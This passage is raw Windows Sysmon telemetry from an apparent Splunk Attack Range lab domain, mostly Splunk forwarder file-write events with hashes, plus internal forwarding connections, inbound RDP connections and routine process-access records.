Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C47D81B3D3EA7C23A45CDB172D9BCE,SHA256=8B6CF426A5FB85196C82EDD6856E5BCC44C873A48B0ED8359D28F66450EF5898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:54.564{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C1C54E8726E352DA86E14C050CB216,SHA256=4B7D87FD2153D4849D7981CFB84A480B9E35E7734C8844E8FD99BCB05BC2FCFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:51.278{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de58210-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:54.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CDDF24A1D6D78C4943E5D42377C7286,SHA256=CF17AB4B7D67678123A9AC259A8D9CACB7DCF69DCADEFB5D4F876B062CD85D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:54.001{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDC4745014C91BEE0EAE99CBA001BD6D,SHA256=8D733443F49FDCDB1826BD117A9ACD4C1CC3566CF925D1F28BD582AF65117CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:55.986{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6EAE40DD9E6661CC4687A3A322F24A7,SHA256=94D06C2C5812ACE3974F7DD050DE4CFDA27D2C66FBF452EA11DA9975353E4890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:55.580{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB12B459FE626B7B3FEC55D462D7C0D,SHA256=CE6C010BF39A79B3C8507C7B00E6E175139A96738C49816E6E4E33A430C8D3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:55.001{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AC706A028F2C00037AD24C2C5F0CA7A,SHA256=E18E31F6F799B9DBA90BF877D9054C04DD54771C72FF9C298E45EC282D680AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:56.595{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBFFEE91822776ED26B27F26696875E,SHA256=4983630286D1BFC2880ADF5967CAB77749E8AE7F17AFD74EECEB9A26B84DF44A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:56.016{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C0FD77C7E027E4ED3F56EB8E332A14,SHA256=9456B8BDACD1233AB36FF01CB90D811F65B8D8535C9E05205ED156D6D42E6E43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:54.043{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:53.770{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61444-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:57.596{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27968D2717D7DC7D94B4A37D61DF3AC,SHA256=1B7C985A45B9ABA16575EFC49A4C8E4AF1F312A38ABB30AD86CC4772A9359038,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:54.889{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59541-false10.0.1.12-8000- 23542300x8000000000000000981306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:57.039{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F362F792BC314BD78FE3784E2E67A74F,SHA256=98605E3E94976ABE086D4308242A316A6DB076E67D1D713C58A3D93DEED15083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:58.596{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9403483FB8DE9371F4C865DA292EE2DD,SHA256=887131ED5E32148DE9CE81B186C2774B747580F408573383EE4B9117E5DFD90D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:58.048{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFA2CA2A02BAE2F315F8DD0E234D9353,SHA256=CCDA2A861E8EFD8829897E57053BD31A300D03D71B88FA8761E168AD5CC41355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:59.596{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C4C49610B2CEF6E6BC71EA1A43A9907,SHA256=34D8B72665AC3CD1611B6D94B58C2E4EEFCCFB81654B8BE38EB1D06EB495D34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:59.985{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=216B05803ABB607EE832E300BC513B8A,SHA256=871A89A34C594BD78407F8E5B6BD7CD9797F6A85552D88DD0DBEC353BF2693E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:59.985{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D21C3D7CBA5487F1C39705E18498C507,SHA256=DF17B4641A3DB42A6E5F34D4E16930D17AC4B632F4E32BBFFC8C1151C4F1984F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:59.063{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAF84107615A1B1254C42A43D9ECEC5A,SHA256=DC6780F55B13C7C71770B94BC71173DBCF083EBFFEA29C2BCB613E6B7B78BCE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.768{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.752{5EBD8912-8CC0-6151-1600-00000000FD01}12961772C:\Windows\system32\svchost.exe{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7de1d|C:\Windows\SYSTEM32\ntdll.dll+3a969|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:59.137{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.596{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA584248EADD04B680BC6AFD4DAFA1DA,SHA256=D7AF7C51DC960BA7A0AF433DDDD20EBC82A0E854F9AB38C7E9CA6968B6CAA506,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:57.179{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64329-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:00.079{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1CC3978618C61D2B42ABA696939606,SHA256=3AE270E163C49F200B3752D8AD7274839F957C6BCD12B57A073FDC9E7A2A8923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:00.580{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=23C807A735C46524D75B8CCD2AF423DA,SHA256=626BB2319B3210970B36BDBC10851FADF4F6A3ECB2096577B96D0B01107E7E73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:01.752{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D823858F790F9A7CF05F88E69C757B8B,SHA256=2C89166A5A2003B622179CC31D857DE6A84C87E756D6E8A044F1799C5F4D40B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:01.752{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CEC911857AAE3285B9E9EB204A4C30FE,SHA256=0538AD05CF354ED8FE2A6DE0FF442211E35BE20B53EB30399762B5A4DB8F03B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:01.596{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC296A31CA7EF14071B5F194D59DBC7,SHA256=BD44B4CCFF51A32B0F123499896C5F7A683BB9212C4D22B57B2ADBA8010B9E73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:58.949{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59847-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:58.741{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65270-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:01.454{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=216B05803ABB607EE832E300BC513B8A,SHA256=871A89A34C594BD78407F8E5B6BD7CD9797F6A85552D88DD0DBEC353BF2693E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:01.079{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C02E8E29AD45A2A520FFF913C4978213,SHA256=6E2259C861430778A6DE3575F3A0B4E36928A4E7E43C4BC5E2BCA7E5D1A17718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:02.659{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AB2841AF04ED09BC2C2B28974290013,SHA256=8E5A6AAA0824426F09C9F3DDD23C6D1C3EBF76F62E95B824DFF5554607CF4AFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:02.094{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED39A94B4A742407FF3E0D1D16950399,SHA256=0BE4AF2A02B14F2A446117FE8E7AB6C742376BB5CE0F4BCFF8C0F1A31F2A2BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:03.676{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EBCDB00EDE66D083EC277D6425E027D,SHA256=E019ABB7AA9B4CE63784ED1F4C46CA3A36A5F68144EB1596295C89EB891CFBB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:00.826{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59542-false10.0.1.12-8000- 23542300x8000000000000000981319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:03.096{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A48617A22CE4EF92C82A9895FCE0F97,SHA256=EA11CE453D100A244FD3BE6902B4CF3D8137270B8E09A886993487E29197C7B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:04.112{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82DA79412283062BA66760B171898AC7,SHA256=EAC439037DC23752DBDA7FBAFB0873795D7E75E7EB4EA97ECD3801831157C311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:04.708{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.hMD5=B133A676D139032A27DE3D9619E70091,SHA256=AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 